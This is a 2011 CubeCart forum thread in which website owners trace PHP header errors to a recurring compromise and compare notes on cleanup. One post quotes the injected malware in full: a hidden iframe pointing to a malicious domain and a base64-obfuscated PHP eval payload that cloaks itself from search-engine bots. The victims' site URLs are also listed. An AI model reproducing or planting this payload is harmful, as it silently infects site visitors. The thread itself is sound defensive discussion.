Guest Posted February 20, 2011 Share Posted February 20, 2011 Since yesterday our web site is broken. All of a sudden it started giving this message................................ Warning: ini_set() [ref.outcontrol]: Cannot change zlib.output_compression - headers already sent in /home/content/c/i/t/citylifeusa/html/store/ini.inc.php on line 114 Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/index_enc_ion.php on line 31 Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/index_enc_ion.php on line 32 Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 213 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 213 Warning: session_regenerate_id() [function.session-regenerate-id]: Cannot regenerate session id - headers already sent in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 214 Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 234 I called the hosting company and they said contact cubecart for this. They can not do anything. Does anyone knows how to fix this? Please help. Quote Link to comment Share on other sites More sharing options...
Robsta Posted February 20, 2011 Share Posted February 20, 2011 I called the hosting company and they said contact cubecart for this. They can not do anything. Does anyone knows how to fix this? Please help. Have you contacted CubeCart support? For a site to just have this start happening without any changes to your store code, it's either a hosting issue (they changed something) or your site files have been changed without your knowledge. Check the file dates on your PHP files for anything recent to around the time this started happening. Look at the files referenced in the error first. Quote Link to comment Share on other sites More sharing options...
Mike MacKechnie Posted February 28, 2011 Share Posted February 28, 2011 I have had the exact same problem since 18th February. It appears to be a trojan, which in my case entered via an out-of-date version of Wordpress. Quote Link to comment Share on other sites More sharing options...
Guest Posted February 28, 2011 Share Posted February 28, 2011 I still could not solve the problem. I am not very familiar with these security issues. Did you get it fixed? Please let me know. I'm having sleepless nights because of this issue. :( Quote Link to comment Share on other sites More sharing options...
Guest Posted February 28, 2011 Share Posted February 28, 2011 I opened a ticket with cube cart support and they were not helpful at all. Instead they wrote me back saying, since this site is blacklisted by Google saying it has malware, they said get the malware issue fixed and then they'll see if there's anything to do with cube cart. I don't know why the web designer used cube cart for the shopping cart. I'm so frustrated with cube cart support. I found a malicious code in the index file. As soon as i delete that the site comes back perfect and the shopping cart works too. But the next day or even after few hours later, the code generates again the in the index and the site get broken. I don't know where or how to find the root cause. thank you for the reply. Quote Link to comment Share on other sites More sharing options...
bsmither Posted February 28, 2011 Share Posted February 28, 2011 Please look at the web access logs for your hosting space. Hopefully your hosting provider gives you access to these files. Those access log files will show the file being exploited to damage your site. If you require personal assistance in helping you determine if you have access to your web access logs and what to look for in those logs, please send me a private message. Quote Link to comment Share on other sites More sharing options...
Mike MacKechnie Posted March 3, 2011 Share Posted March 3, 2011 I have rebuilt my store from scratch on a different directory, and it is no longer infected. However, all my other subdomains are still infected, which makes me think that there is some rogue code somewhere on one or more of my sites which is regenerating the iframe whenever it is loaded. I have searched for the usual suspects (eval, base64_decode, gzinflate, gzuncompress) but there's got to be something else out there that is doing the damage. I have also reported it to unmaskparasites.com as follows: repeated hacks into all index.htm files; insert of iframe "<iframe src="http://bdfj45jfdkhkm.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>" as first line after <body> tag or for index.php instances: <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoI jY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG 9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9mZ2VkeXUzaHJlaHNoLmNvLmNjL1FRa0ZCZzBBQVEwTUJBMERFa2NKQlFZTkF3Y0NBUU1NQXc9PSIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC9pZnJhbWU+JzsNCn0=')); sites affected http://www.wymeruk.co.uk/ http://www.wymeruk.co.uk/Store http://mbtp.wymeruk.co.uk/ http://www.scruntlehawk.com/ http://autumn.wymeruk.co.uk/ http://www.removalsbedford.co.uk/ http://www.nicksimper.com/ I edit the files remotely to remove the iframe tags but within 24 hours they are back, usually referencing a new domain name in their src= statement. I have changed all ftp passwords and upgraded wordpress where applicable. All these sites are hosted on the same HostMonster account. http://www.removalsbedford.co.uk/ was running an old version of Wordpress prior to the attack. Quote Link to comment Share on other sites More sharing options...
bsmither Posted March 3, 2011 Share Posted March 3, 2011 I have a very important question to ask: are your CubeCart installations v4 or v3? Quote Link to comment Share on other sites More sharing options...
Guest Posted March 3, 2011 Share Posted March 3, 2011 My cubecart version is 4.3.8. I have the same attack as Mike explained. It happened on Feb 18th. The iframe is same also same insert of iframe "<iframe src="http://bdfj45jfdkhkm.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" But the malicious code was generating only inside the store folder index.php file. And it's also the same as Mikes eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib........... Last week every time I delete this code from the index page, the site came back to normal but the code regenerate after few hours. But few days ago I put a security patch I found in the cube cart forum and now this code stopped generating in my index file. So the site looks okay. But when I type www.citylifeusa.com in internet explorer, I can see tin the status bar the web site is redirecting through the hackers domain http://bdfj45jfdkhkm.co.cc.. what do you think I should do about this. I'm sure the problem is not solved even though i don't get that header error message anymore. Looks like the traffic is going through the above bad domain. So they have capture my domain name? I have attached a copy of the malicious code that used to generate inside the index.php. Quote Link to comment Share on other sites More sharing options...
bsmither Posted March 3, 2011 Share Posted March 3, 2011 You still have the iframe. It appears that the index file in your main site (as opposed to the store folder) has been damaged. I see the refresh to the /store/ folder, however, and a very quick glance through the store code as delivered to my browser shows no damage. I believe they haven't captured your domain name. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.